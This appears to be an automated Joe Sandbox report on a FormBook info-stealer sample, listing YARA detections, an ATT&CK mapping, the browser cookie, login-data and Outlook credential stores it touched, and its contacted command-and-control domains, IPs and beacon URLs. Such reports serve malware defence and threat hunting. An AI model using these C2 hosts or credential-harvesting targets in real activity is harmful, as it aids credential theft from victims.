Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\icacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Services File Permissions Weakness	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Services File Permissions Weakness	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fHkdf4WB7zhMcqP.exe	32%	ReversingLabs	Win32.Trojan.CrypterX
fHkdf4WB7zhMcqP.exe	38%	Virustotal		Browse
fHkdf4WB7zhMcqP.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	32%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.havan-oficial.online	2%	Virustotal	Browse
2q33e.top	2%	Virustotal	Browse
wcp95.top	2%	Virustotal	Browse
electronify.shop	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.wddb97.top	0%	Avira URL Cloud	safe
http://www.qadlo.life/woqs/	0%	Avira URL Cloud	safe
http://www.2q33e.top/4loa/	0%	Avira URL Cloud	safe
http://www.wcp95.top/x8cs/?fZah6=bj7RC6TSXqG0XZdA36atdanyU4qMo2uf9tu81Jz1rZWpiEIrMua+i+fZ8jkzZnBN7K16BubLDLaDoM8eXU5kjEJcS1M5B544eLAADTP2O+nB8SN15NaKPxM=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
https://lirik.xyz/	0%	Avira URL Cloud	safe
http://www.7nz4.xyz/fmne/?42T8f=ABwh0lAHdJnXMBd&fZah6=KT9ASLL7nshZG3MA1LywRmktUAzm0MonJvohshJAkYyq/X4JJvhRXZaeRtgNm/hpfh3HE8zpNq8ggvV/Ig5z2ZvxJO0/GJu4PVG82LAWI/PjCbr5iIHKPVw=	0%	Avira URL Cloud	safe
http://www.qadlo.life/woqs/?fZah6=wiTqGDnmX/c8wYk1K3U3i02cYFo4f9Rwlcub3NbkYBpLwl8ATlKj09fiWtFQA99a/0iGj4H9zxIjdkaMmIp9HB1ch/llL5XaFQCQlOxZHX37Rc52Pv+iRyU=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.mythkitchen.net/jpec/?42T8f=ABwh0lAHdJnXMBd&fZah6=H/6EYszByJpADA+WA3Vqt418sGn9uf8tg+SGSp7tj40HLMf8PQbgyfoSnaQ4KyKmnn8a8l03/u5+bfBufpbeP/ygRn3ZetvVjymO339MDPXXlNpwByLpzyY=	0%	Avira URL Cloud	safe
http://www.havan-oficial.online/6yvy/	0%	Avira URL Cloud	safe
http://www.figa1digital.services/zjtq/	0%	Avira URL Cloud	safe
http://www.lowerbackpain.site/t9om/	0%	Avira URL Cloud	safe
http://www.digitalincomenow.net/eziw/?fZah6=eIA0Jd5aMS2L7DX5fIIZoNagEXcpH0QKyJTSXVeeqMeXfMTLyOlbTsl/2ncp1mdFNMCAwgVL1bSg13wM91y9oVrWsMArp8Gmd60S1VkCFu8W6LIlsIwOfco=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.electronify.shop/0s9c/	0%	Avira URL Cloud	safe
http://www.electronify.shop/0s9c/?fZah6=S3rghNbYyRcMPCNqAPl1nBp46vs8gCt4oCoKFWGUUYIGj18qpRc3RQpFXxaxtfL1u/vEqVXnsxI0ESu2OB/aFp2EnULTCH6lqS30MNPC1ACJqrjLawOg2io=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.lowerbackpain.site/t9om/?fZah6=n0WfMl5CnLPcYEIDSbX8vA256gGCe+H9L+kKo2v7Vr4MgHUbO89S9QyuVriZ/m6E+Bwct3PaGgmX9ENC/wR4gZ3UutUQij8B41Y6ve4/n9x34EbJwWPEaRw=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.wcp95.top/x8cs/	0%	Avira URL Cloud	safe
http://www.sakkal.comG	0%	Avira URL Cloud	safe
http://www.akkushaber.xyz/x784/	0%	Avira URL Cloud	safe
http://www.innovators.group/aol7/	0%	Avira URL Cloud	safe
http://www.36ded.top/cisl/?fZah6=lWbjfgsSROluEJiB130lMvTTODsRzMpi0/0hjnk2IWgqE7GjKRd2WK82uOKTApKAYp80eLoSkDd+9uj5wYnhWREwRAyCHQcyRtiVUe8dDUuRz//M0PaFelw=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.figa1digital.services/zjtq/?fZah6=Cuuzl5FVgphuAFBESmHRpvP2Veux2vrxQdW4Gde9XtzmimLWUn4Ll1T5MO27eRDtOrOWVppgjVRQMehzsGxVlZovxZP6uR3wLXZLAqFvA+7mOHQos1c683Q=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.7nz4.xyz/fmne/	0%	Avira URL Cloud	safe
http://www.digitalincomenow.net/eziw/	0%	Avira URL Cloud	safe
http://www.innovators.group/aol7/?fZah6=Rxu8Z90G9VWM2dhhwInP5UWvQ8oNZRnGbIBiN2Yx7zo2WUAB2/dtC+DxHmOlvC9JJTkxcfTX/APyKTxCxnQfyKdrjKf6HloyJ1pBHAL5FHO6MnioIGNGXfY=&42T8f=ABwh0lAHdJnXMBd	0%	Avira URL Cloud	safe
http://www.36ded.top/cisl/	0%	Avira URL Cloud	safe
http://www.ulula.org/4w1b/?42T8f=ABwh0lAHdJnXMBd&fZah6=X2GTIolTa1UnBQ8Mt4GmPrXHDjrv0FKKXiYqznC6itjD0Z2FTorZXZ1nTumJudmkhSgQe73MRozJqa0gxwnUHUwni1KndLADF3HY4z2B7/J9VzK4aV2y2BM=	0%	Avira URL Cloud	safe
http://www.2q33e.top/4loa/?42T8f=ABwh0lAHdJnXMBd&fZah6=SN4PMyo74av9+JlAjXvK/p/EMbnZZTDB5nvebkFF6pc7tGQcTkdQn496kLp0em7XFopoYz6akDPS3Yl+mttD1trTUMnQbHN5WHDpnwWuc7UyUJZMySE4MJ8=	0%	Avira URL Cloud	safe
http://www.wddb97.top/cjue/	0%	Avira URL Cloud	safe
http://www.mythkitchen.net/jpec/	0%	Avira URL Cloud	safe
http://www.ulula.org/4w1b/	0%	Avira URL Cloud	safe
http://www.akkushaber.xyz/x784/?42T8f=ABwh0lAHdJnXMBd&fZah6=z1xRKJbVI4qWZJYuN3/Y1QlPgxFzBlHz+yp8GvsKYYCXapov62MLDH6IViKuZ3c2V3KnFmbn4PDNDh0fz7SuvPnX+7QhQmDMmkdFhT0O1l19tgipO3DZ86o=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.havan-oficial.online	199.59.243.227	true	true	2%, Virustotal, Browse	unknown
2q33e.top	38.47.233.52	true	true	2%, Virustotal, Browse	unknown
wcp95.top	154.23.184.95	true	true	2%, Virustotal, Browse	unknown
electronify.shop	84.32.84.32	true	true	0%, Virustotal, Browse	unknown
36ded.top	154.23.184.141	true	true		unknown
www.ulula.org	13.248.169.48	true	true		unknown
wddb97.top	206.119.82.172	true	true		unknown
www.qadlo.life	162.0.211.143	true	true		unknown
7nz4.xyz	38.55.215.72	true	true		unknown
mythkitchen.net	3.33.130.190	true	true		unknown
digitalincomenow.net	3.33.130.190	true	true		unknown
www.figa1digital.services	188.114.97.3	true	true		unknown
www.akkushaber.xyz	172.67.217.176	true	true		unknown
berita-juli2024162.sbs	67.223.118.17	true	true		unknown
www.innovators.group	13.248.169.48	true	true		unknown
www.lowerbackpain.site	199.59.243.227	true	true		unknown
www.wddb97.top	unknown	unknown	false		unknown
www.berita-juli2024162.sbs	unknown	unknown	false		unknown
www.36ded.top	unknown	unknown	false		unknown
www.7nz4.xyz	unknown	unknown	true		unknown
www.wcp95.top	unknown	unknown	false		unknown
www.mythkitchen.net	unknown	unknown	false		unknown
www.electronify.shop	unknown	unknown	false		unknown
www.digitalincomenow.net	unknown	unknown	false		unknown
www.2q33e.top	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.qadlo.life/woqs/?fZah6=wiTqGDnmX/c8wYk1K3U3i02cYFo4f9Rwlcub3NbkYBpLwl8ATlKj09fiWtFQA99a/0iGj4H9zxIjdkaMmIp9HB1ch/llL5XaFQCQlOxZHX37Rc52Pv+iRyU=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.mythkitchen.net/jpec/?42T8f=ABwh0lAHdJnXMBd&fZah6=H/6EYszByJpADA+WA3Vqt418sGn9uf8tg+SGSp7tj40HLMf8PQbgyfoSnaQ4KyKmnn8a8l03/u5+bfBufpbeP/ygRn3ZetvVjymO339MDPXXlNpwByLpzyY=	true	Avira URL Cloud: safe	unknown
http://www.figa1digital.services/zjtq/	true	Avira URL Cloud: safe	unknown
http://www.wcp95.top/x8cs/?fZah6=bj7RC6TSXqG0XZdA36atdanyU4qMo2uf9tu81Jz1rZWpiEIrMua+i+fZ8jkzZnBN7K16BubLDLaDoM8eXU5kjEJcS1M5B544eLAADTP2O+nB8SN15NaKPxM=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.2q33e.top/4loa/	true	Avira URL Cloud: safe	unknown
http://www.havan-oficial.online/6yvy/	true	Avira URL Cloud: safe	unknown
http://www.qadlo.life/woqs/	true	Avira URL Cloud: safe	unknown
http://www.7nz4.xyz/fmne/?42T8f=ABwh0lAHdJnXMBd&fZah6=KT9ASLL7nshZG3MA1LywRmktUAzm0MonJvohshJAkYyq/X4JJvhRXZaeRtgNm/hpfh3HE8zpNq8ggvV/Ig5z2ZvxJO0/GJu4PVG82LAWI/PjCbr5iIHKPVw=	true	Avira URL Cloud: safe	unknown
http://www.digitalincomenow.net/eziw/?fZah6=eIA0Jd5aMS2L7DX5fIIZoNagEXcpH0QKyJTSXVeeqMeXfMTLyOlbTsl/2ncp1mdFNMCAwgVL1bSg13wM91y9oVrWsMArp8Gmd60S1VkCFu8W6LIlsIwOfco=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.electronify.shop/0s9c/?fZah6=S3rghNbYyRcMPCNqAPl1nBp46vs8gCt4oCoKFWGUUYIGj18qpRc3RQpFXxaxtfL1u/vEqVXnsxI0ESu2OB/aFp2EnULTCH6lqS30MNPC1ACJqrjLawOg2io=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.lowerbackpain.site/t9om/	true	Avira URL Cloud: safe	unknown
http://www.lowerbackpain.site/t9om/?fZah6=n0WfMl5CnLPcYEIDSbX8vA256gGCe+H9L+kKo2v7Vr4MgHUbO89S9QyuVriZ/m6E+Bwct3PaGgmX9ENC/wR4gZ3UutUQij8B41Y6ve4/n9x34EbJwWPEaRw=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.akkushaber.xyz/x784/	true	Avira URL Cloud: safe	unknown
http://www.electronify.shop/0s9c/	true	Avira URL Cloud: safe	unknown
http://www.wcp95.top/x8cs/	true	Avira URL Cloud: safe	unknown
http://www.innovators.group/aol7/	true	Avira URL Cloud: safe	unknown
http://www.36ded.top/cisl/?fZah6=lWbjfgsSROluEJiB130lMvTTODsRzMpi0/0hjnk2IWgqE7GjKRd2WK82uOKTApKAYp80eLoSkDd+9uj5wYnhWREwRAyCHQcyRtiVUe8dDUuRz//M0PaFelw=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.innovators.group/aol7/?fZah6=Rxu8Z90G9VWM2dhhwInP5UWvQ8oNZRnGbIBiN2Yx7zo2WUAB2/dtC+DxHmOlvC9JJTkxcfTX/APyKTxCxnQfyKdrjKf6HloyJ1pBHAL5FHO6MnioIGNGXfY=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.7nz4.xyz/fmne/	true	Avira URL Cloud: safe	unknown
http://www.figa1digital.services/zjtq/?fZah6=Cuuzl5FVgphuAFBESmHRpvP2Veux2vrxQdW4Gde9XtzmimLWUn4Ll1T5MO27eRDtOrOWVppgjVRQMehzsGxVlZovxZP6uR3wLXZLAqFvA+7mOHQos1c683Q=&42T8f=ABwh0lAHdJnXMBd	true	Avira URL Cloud: safe	unknown
http://www.digitalincomenow.net/eziw/	true	Avira URL Cloud: safe	unknown
http://www.ulula.org/4w1b/?42T8f=ABwh0lAHdJnXMBd&fZah6=X2GTIolTa1UnBQ8Mt4GmPrXHDjrv0FKKXiYqznC6itjD0Z2FTorZXZ1nTumJudmkhSgQe73MRozJqa0gxwnUHUwni1KndLADF3HY4z2B7/J9VzK4aV2y2BM=	true	Avira URL Cloud: safe	unknown
http://www.36ded.top/cisl/	true	Avira URL Cloud: safe	unknown
http://www.2q33e.top/4loa/?42T8f=ABwh0lAHdJnXMBd&fZah6=SN4PMyo74av9+JlAjXvK/p/EMbnZZTDB5nvebkFF6pc7tGQcTkdQn496kLp0em7XFopoYz6akDPS3Yl+mttD1trTUMnQbHN5WHDpnwWuc7UyUJZMySE4MJ8=	true	Avira URL Cloud: safe	unknown
http://www.mythkitchen.net/jpec/	true	Avira URL Cloud: safe	unknown
http://www.wddb97.top/cjue/	true	Avira URL Cloud: safe	unknown
http://www.ulula.org/4w1b/	true	Avira URL Cloud: safe	unknown
http://www.akkushaber.xyz/x784/?42T8f=ABwh0lAHdJnXMBd&fZah6=z1xRKJbVI4qWZJYuN3/Y1QlPgxFzBlHz+yp8GvsKYYCXapov62MLDH6IViKuZ3c2V3KnFmbn4PDNDh0fz7SuvPnX+7QhQmDMmkdFhT0O1l19tgipO3DZ86o=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.wddb97.top	qLmzoTzSrlQuBN.exe, 00000013.00000002.4129656762.0000000004F19000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lirik.xyz/	icacls.exe, 0000000D.00000002.4129046811.0000000004E90000.00000004.10000000.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000004470000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	icacls.exe, 0000000D.00000002.4129046811.0000000004392000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4129046811.0000000003D4A000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4130793758.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000003972000.00000004.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.000000000332A000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	icacls.exe, 0000000D.00000002.4129046811.0000000003894000.00000004.10000000.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002E74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025FA4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1774386531.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, vssfbkdOErXuYi.exe, 00000009.00000002.1925293857.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.comG	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783004757.00000000054B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr	false		high
http://www.carterandcone.coml	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
206.119.82.172	wddb97.top	United States	174	COGENT-174US	true
13.248.169.48	www.ulula.org	United States	16509	AMAZON-02US	true
67.223.118.17	berita-juli2024162.sbs	United States	15189	VIMRO-AS15189US	true
162.0.211.143	www.qadlo.life	Canada	35893	ACPCA	true
38.47.233.52	2q33e.top	United States	174	COGENT-174US	true
199.59.243.227	www.havan-oficial.online	United States	395082	BODIS-NJUS	true
84.32.84.32	electronify.shop	Lithuania	33922	NTT-LT-ASLT	true
154.23.184.95	wcp95.top	United States	174	COGENT-174US	true
172.67.217.176	www.akkushaber.xyz	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	www.figa1digital.services	European Union	13335	CLOUDFLARENETUS	true
38.55.215.72	7nz4.xyz	United States	174	COGENT-174US	true
154.23.184.141	36ded.top	United States	174	COGENT-174US	true
3.33.130.190	mythkitchen.net	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553424
